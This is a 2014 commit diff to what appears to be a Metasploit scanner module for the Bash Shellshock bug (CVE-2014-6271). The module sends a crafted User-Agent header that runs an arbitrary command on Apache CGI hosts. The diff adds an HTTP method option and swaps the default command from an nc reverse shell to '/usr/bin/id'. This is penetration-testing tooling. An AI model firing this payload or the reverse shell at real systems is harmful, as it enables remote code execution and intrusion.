Add variable HTTP method and other stuff

wvu · wvu · commit ecb10ebe284b · 2014-09-24T22:41:01.000-05:00
diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -24,7 +24,8 @@ def initialize(info = {})
       ],
       'References' => [
         ['CVE', '2014-6271'],
-        ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
+        ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-' +
+          'crafted-environment-variables-code-injection-attack/'],
         ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
       ],
       'DisclosureDate' => 'Sep 24 2014',
@@ -33,17 +34,22 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'Path to CGI script']),
+      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
       OptString.new('CMD', [true, 'Command to run (absolute paths required)',
-        '/bin/nc -e /bin/sh 127.0.0.1 4444 &'])
+        '/usr/bin/id'])
     ], self.class)
   end
 
   def run_host(ip)
-    send_request_cgi(
-      'method' => 'GET',
+    res = send_request_raw(
+      'method' => datastore['METHOD'],
       'uri' => normalize_uri(target_uri.path),
       'agent' => "() { :;}; #{datastore['CMD']}"
     )
+
+    if res && res.code == 200
+      vprint_good(res.body)
+    end
   end
 
 end
